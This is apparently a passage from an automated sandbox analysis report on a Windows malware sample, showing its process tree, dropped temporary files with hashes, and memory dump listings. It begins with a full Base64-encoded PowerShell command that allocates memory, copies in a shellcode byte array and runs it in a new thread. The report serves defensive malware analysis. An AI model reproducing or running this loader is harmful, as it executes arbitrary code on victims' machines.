      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABNAGcAUwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE0AZwBTACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAA5ADcALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeABjADUALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAZQA3ACwAMAB4ADYAYwAsADAAeABjAGEALAAwAHgAMwAwACwAMAB4AGYAYgAsADAAeAA5ADkALAAwAHgAOAA1ACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgANQBhACwAMAB4AGYAYQAsADAAeAA4AGEALAAwAHgAZAAxACwAMAB4ADMAZQAsADAAeAA3ADEALAAwAHgAYgBlACwAMAB4AGUANQAsADAAeAAzADcALAAwAHgANgAwACwAMAB4AGIANAAsADAAeAA1ADcALAAwAHgANAA0ACwAMAB4AGUAMAAsADAAeAA5ADkALAAwAHgANAAzACwAMAB4ADYANQAsADAAeAAwADkALAAwAHgAOQA2ACwAMAB4ADEAOQAsADAAeABhAGQALAAwAHgAZgBhACwAMAB4ADEAZQAsADAAeAA5ADcALAAwAHgAOABiACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOAAsADAAeAA1ADQALAAwAHgANQBkACwAMAB4AGQAMQAsADAAeAAzAGMALAAwAHgAYgA3ACwAMAB4ADUAYwAsADAAeAAxAGEALAAwAHgAMwAxACwAMAB4AGIANgAsADAAeAA5ADkALAAwAHgAZQBkACwAMAB4ADMAZgAsADAAeAA1ADcALAAwAHgANwA3ACwAMAB4ADYANgAsADAAeABlAGQALAAwAHgAYgA3ACwAMAB4AGYAMwAsADAAeAAzAGEALAAwAHgAMgBlACwAMAB4AGUAZgAsADAAeAAwADIALAAwAHgANgBhACwAMAB4AGMANQAsADAAeAA0AGYALAAwAHgANwBkACwAMAB4ADAAZgAsADAAeAAxAGEALAAwAHgAMwBiACwAMAB4ADMAMQAsADAAeAAwAGUALAAwAHgANABiACwAMAB4ADkANAAsADAAeAA0ADIALAAwAHgANAA4ACwAMAB4ADQAYgAsADAAeAAxADQALAAwAHgAOAA2ACwAMAB4AGUAMwAsADAAeABjADMALAAwAHgAMABlACwAMAB4AGEAZAAsADAAeAAzAGEALAAwAHgAYQA3ACwAMAB4ADEAMgAsADAAeAA5AGMALAAwAHgANAAzACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAZQBhACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAwACwAMAB4ADIAMwAsADAAeAA4ADYALAAwAHgANQA1ACwAMAB4ADAAMwAsADAAeAA0ADkALAAwAHgAYQBhACwAMAB4ADUANwAsADAAeAA1AGIALAAwAHgANgBhACwAMAB4ADUAMgAsADAAeAAyADIALAAwAHgAOQA3ACwAMAB4ADgAOAAsADAAeABlAGYALAAwAHgAMwA1ACwAMAB4ADYAYwAsADAAeABmADIALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeAA3ADMALAAwAHgANQA0ACwAMAB4AGIAOAAsADAAeAA2ADMALAAwAHgANQAwACwAMAB4ADYANAAsADAAeAA2AGQALAAwAHgAZgA1ACwAMAB4ADEAMwAsADAAeAA2AGEALAAwAHgAZABhACwAMAB4ADcAMQAsADAAeAA3AGIALAAwAHgANgBmACwAMAB4AGQAZAAsADAAeAA1ADYALAAwAHgAZgA3ACwAMAB4ADgAYgAsADAAeAA1ADYALAAwAHgANQA5ACwAMAB4AGQAOAAsADAAeAAxAGQALAAwAHgAMgBjACwAMAB4ADcAZQAsADAAeABmAGMALAAwAHgANAA2ACwAMAB4AGYANwAsADAAeAAxAGYALAAwAHgAYQA1ACwAMAB4ADIAMgAsADAAeAA1ADYALAAwAHgAMQBmACwAMAB4AGIANQAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADgANQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4ADUAZQAsADAAeABiADkALAAwAHgAMwBkACwAMAB4AGMAMQAsADAAeAA1AGYALAAwAHgAZQA3ACwAMAB4AGEAOQAsADAAeAAwAGQALAAwAHgAYQBkACwAMAB4ADEAOAAsADAAeAAyAGEALAAwAHgAMQBhACwAMAB4AGEANgAsADAAeAA2AGIALAAwAHgAMQA4ACwAMAB4ADgANQAsADAAeAAxAGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAA0AGUALAAwAHgAYgBhACwAMAB4AGYAMwAsADAAeAAyADEALAAwAHgANQA4ACwAMAB4ADMAZAAsADAAeAAyAGIALAAwAHgAOAA5ACwAMAB4ADAAOQAsADAAeABjADAALAAwAHgAYwBjACwAMAB4AGUAYQAsADAAeAAwADAALAAwAHgAMAA2ACwAMAB4ADkAOAAsADAAeABiAGEALAAwAHgAMwBhACwAMAB4AGEAZgAsADAAeABhADEALAAwAHgANQAwACwAMAB4AGIAYgAsADAAeAA1ADAALAAwAHgANwA0ACwAMAB4AGMAYwAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIANwAsADAAeABiADkALAAwAHgAYwA3ACwAMAB4ADEAZQAsADAAeAA1ADAALAAwAHgAYgA4ACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAMwAwACwAMAB4ADMANQAsADAAeAAyADEALAAwAHgANgBkACwAMAB4ADYAMAAsADAAeAAxADYALAAwAHgAZgBlACwAMAB4AGMAZAAsADAAeABkADAALAAwAHgAZAA2ACwAMAB4AGEAZQAsADAAeABhADUALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeAA5ADEALAAwAHgAZAA1ACwAMAB4ADQANAAsADAAeAAzADMALAAwAHgAYgBhACwAMAB4ADcAZgAsADAAeABhAGIALAAwAHgAZQBhACwAMAB4ADkAMgAsADAAeAAxADcALAAwAHgANQAyACwAMAB4AGIANwAsADAAeAA2ADkALAAwAHgAOAA2ACwAMAB4ADkAYgAsADAAeAA2AGQALAAwAHgAMQA0ACwAMAB4ADgAOAAsADAAeAAxADAALAAwAHgAOAAyACwAMAB4AGUAOAAsADAAeAA0ADYALAAwAHgAZAAxACwAMAB4AGUAZgAsADAAeABmAGEALAAwAHgAMwBlACwAMAB4ADEAMQAsADAAeABiAGEALAAwAHgAYQAxACwAMAB4AGUAOAAsADAAeAAyAGUALAAwAHgAMQAwACwAMAB4AGMAZgAsADAAeAAxADQALAAwAHgAYgBiACwAMAB4ADkAZgAsADAAeAA0ADYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeABhADIALAAwAHgAYgBmACwAMAB4AGEAMwAsADAAeABmAGMALAAwAHgANQBkACwAMAB4AGUAYQAsADAAeABiADgALAAwAHgAMwA1ACwAMAB4AGMAOAAsADAAeAA1ADUALAAwAHgAZAA2ACwAMAB4ADMAOQAsADAAeAAxAGMALAAwAHgANQA2ACwAMAB4ADIANgAsADAAeAA2AGMALAAwAHgANwA2ACwAMAB4ADUANgAsADAAeAA0AGUALAAwAHgAYwA4ACwAMAB4ADIAMgAsADAAeAAwADUALAAwAHgANgBiACwAMAB4ADEANwAsADAAeABmAGYALAAwAHgAMwA5ACwAMAB4ADIAMAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA5ADUALAAwAHgAMAA1ACwAMAB4ADYAOQAsADAAeAA5ADYALAAwAHgAYwAwACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgANgA5ACwAMAB4ADIANwAsADAAeAA3ADMALAAwAHgAMABhACwAMAB4AGIAYwAsADAAeAAwADEALAAwAHgAMAAxACwAMAB4ADYAMgAsADAAeAA3AGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEEAQgBUAHUAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEEAQgBUAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEEAQgBUAHUALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3040
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wssszrrb.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2656
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC66C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC66B.tmp"
        6⤵
        
        PID:2464

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC66C.tmp

Filesize
1KB

MD5
52a7d7e0553255577d1c720a83537d0e

SHA1
07ad3245ebef09fb5ff0ccbee068c457df3f1c01

SHA256
056036a0a80c9f115a9332ba6c712892e6f3bbfc98d2c37b64cf0c53a873e9ba

SHA512
d12f6a65d246e258afacf93fd73408b5461dc04d71320122ed08fdb7ae52ff84c407bc594282c8add870750b99c6b19539d9cdfac91b9414eaafd6f935240df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\wssszrrb.dll

Filesize
3KB

MD5
bd0aebe7b3ba6942b9577691409d841a

SHA1
97c3405aa9e60e7d668e3dbef037e81c44ee4490

SHA256
e658271e438347a2a0e060fd24d168dcc1d69635756cc94d40c496aca737458e

SHA512
774e4bd59462922cda2ee4799d7d6f1dc36b720e9ba97ac337c9f78b9d082bb6e4c5673b2a757ed49dde86e55d45270e2b8c0a9f8689fd3218e678a1721bad28

Download Submit
C:\Users\Admin\AppData\Local\Temp\wssszrrb.pdb

Filesize
7KB

MD5
04461352af30e2d1b87a5df02e10ff0a

SHA1
ef4bb22c74797064598b8d11eb533a7fe71d56fc

SHA256
e3d1882dd1421f58edcccab7c58acabc3f04794e8afbf14974a099b4fc347b7b

SHA512
5b9e23e0ad0955490e9c45e0b68a743b4ac33f88c08f146677de30905fdbbc68f29139b7aeddbbca2af9da6466cd9e4c8ea85413757b74587e2e951ed8a80e5b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UITTSVAUZNZMOZMSGLOI.temp

Filesize
7KB

MD5
4e0fe59e3f6ba777ad6283d9013bbaed

SHA1
2344bf4595426718de29a8343beee75c762f188c

SHA256
a44efc944ab779bfcc07ce8e3c3b51c63c11d34329106ee60ce26f6d47b98201

SHA512
45b9cb08e9535ac460ed160e4d5af7651ec6747f9bcb5be941544da549cdde247779c1d9d03613568cd1802650f146902426fb85f6c1f3ee1947580c9bf80dc6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC66B.tmp

Filesize
652B

MD5
7128747347644512f15506322005aaa1

SHA1
878e24e085711856c979b08d47cf27ef5f606afa

SHA256
4f40f5a14b066e0631fe3c32137a2ac234a69730eac9efeeebe396a627bd7b99

SHA512
981846e956221e81bd1a54687e8c4e1cc821a890940d07a8b4819cbe7fee7142f3dfa6060dd662ef252159c7cce3a62a5544fde335464edeabd5448fcd0a29fc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wssszrrb.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wssszrrb.cmdline

Filesize
309B

MD5
170d971a87f8340cf9f1bd7420606021

SHA1
fd06b423c1de8f55a469769365353bea4a109601

SHA256
8b6dc4df6e81589dc6a9dde671c31f76f51c6da0c493480292fbcd6f5a82bd38

SHA512
4ab92066f48101ef6f8504da2136302095c05ddb81a6b93311d350a59d65a821ad6038db88b7d522ba7d147982b1981e2e1d5fd3269526ff3bf9127aa88aa60d

Download Submit
memory/1224-1-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

Filesize
9.9MB

Download
memory/1224-25-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

Filesize
9.9MB

Download
memory/1224-0-0x0000000001120000-0x000000000112A000-memory.dmp

Filesize
40KB

Download
memory/2552-12-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-8-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-44-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-42-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-41-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-13-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-11-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-10-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-40-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-7-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2552-9-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2552-38-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-6-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

Filesize
2.9MB

Download
memory/2656-26-0x0000000001F70000-0x0000000001FB0000-memory.dmp

Filesize
256KB

Download
memory/3040-37-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/3040-39-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/3040-16-0x00000000735C0000-0x0000000073B6B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-19-0x0000000002280000-0x00000000022C0000-memory.dmp

Filesize
256KB

Download
memory/3040-17-0x00000000735C0000-0x0000000073B6B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-43-0x00000000735C0000-0x0000000073B6B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-18-0x0000000002280000-0x00000000022C0000-memory.dmp

Filesize
256KB

Download
memory/3040-45-0x0000000002280000-0x00000000022C0000-memory.dmp

Filesize
256KB

Download
memory/3040-46-0x0000000002280000-0x00000000022C0000-memory.dmp

Filesize
256KB

Download
memory/3040-47-0x0000000002280000-0x00000000022C0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads